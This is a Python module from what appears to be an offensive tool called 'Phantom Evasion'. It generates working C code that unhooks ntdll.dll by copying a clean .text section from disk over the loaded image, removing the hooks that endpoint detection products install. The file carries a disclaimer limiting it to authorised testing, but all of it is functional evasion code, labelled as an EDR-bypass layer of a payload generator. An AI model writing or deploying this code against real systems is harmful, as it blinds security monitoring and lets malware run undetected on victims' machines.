"""
Phantom Evasion - Unhook ntdll.dll EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_unhook_ntdll() -> Dict[str, Any]:
    """Generate C code to restore ntdll.dll's .text section from a clean copy on disk.

    EDR products hook ntdll.dll functions by overwriting the first few bytes of
    API prologues with jump instructions that redirect execution to their
    monitoring code. This technique:
      1. Opens ``\\KnownDlls\\ntdll.dll`` (kernel object) or the file on disk.
      2. Creates a clean in-memory mapping of the library.
      3. Copies the `.text` section of the clean copy over the hooked version.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_UNHOOK_NTDLL__
#define __PHANTOM_UNHOOK_NTDLL__
// Unhook ntdll.dll – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Restores the .text section of the in-memory ntdll.dll from a clean on-disk copy,
// removing any inline hooks placed by EDR products.

#include <windows.h>

static BOOL unhook_ntdll(void) {
    // 1. Locate the ntdll loaded in this process
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return FALSE;

    // 2. Open the on-disk ntdll for reading
    WCHAR ntdll_path[MAX_PATH] = {0};
    GetSystemDirectoryW(ntdll_path, MAX_PATH);
    wcscat_s(ntdll_path, MAX_PATH, L"\\ntdll.dll");

    HANDLE hFile = CreateFileW(ntdll_path, GENERIC_READ, FILE_SHARE_READ,
                               NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return FALSE;

    // 3. Create a file mapping and map a view of the clean ntdll
    HANDLE hMapping = CreateFileMappingW(hFile, NULL, PAGE_READONLY | SEC_IMAGE,
                                         0, 0, NULL);
    CloseHandle(hFile);
    if (!hMapping) return FALSE;

    LPVOID pClean = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
    CloseHandle(hMapping);
    if (!pClean) return FALSE;

    // 4. Locate the .text section in both images and copy over hooks
    PIMAGE_DOS_HEADER dos_hooked = (PIMAGE_DOS_HEADER)hNtdll;
    PIMAGE_NT_HEADERS nt_hooked  = (PIMAGE_NT_HEADERS)((BYTE *)hNtdll + dos_hooked->e_lfanew);
    PIMAGE_SECTION_HEADER sec    = IMAGE_FIRST_SECTION(nt_hooked);

    for (WORD i = 0; i < nt_hooked->FileHeader.NumberOfSections; i++, sec++) {
        if (memcmp(sec->Name, ".text", 5) == 0) {
            DWORD old_protect = 0;
            LPVOID hooked_addr = (BYTE *)hNtdll + sec->VirtualAddress;
            SIZE_T region_size = sec->Misc.VirtualSize;

            // Make the .text section writable temporarily
            if (!VirtualProtect(hooked_addr, region_size,
                                PAGE_EXECUTE_WRITECOPY, &old_protect))
                break;

            // Copy clean bytes over the hooked region
            memcpy(hooked_addr,
                   (BYTE *)pClean + sec->VirtualAddress,
                   region_size);

            // Restore original protection
            VirtualProtect(hooked_addr, region_size, old_protect, &old_protect);
            break;
        }
    }

    UnmapViewOfFile(pClean);
    return TRUE;
}
#endif /* __PHANTOM_UNHOOK_NTDLL__ */
"""

    return {
        "code": code,
        "description": "Restore ntdll .text section from clean on-disk copy to remove EDR hooks",
        "layer": "Layer 2 - EDR Bypass",
        "name": "unhook_ntdll",
    }
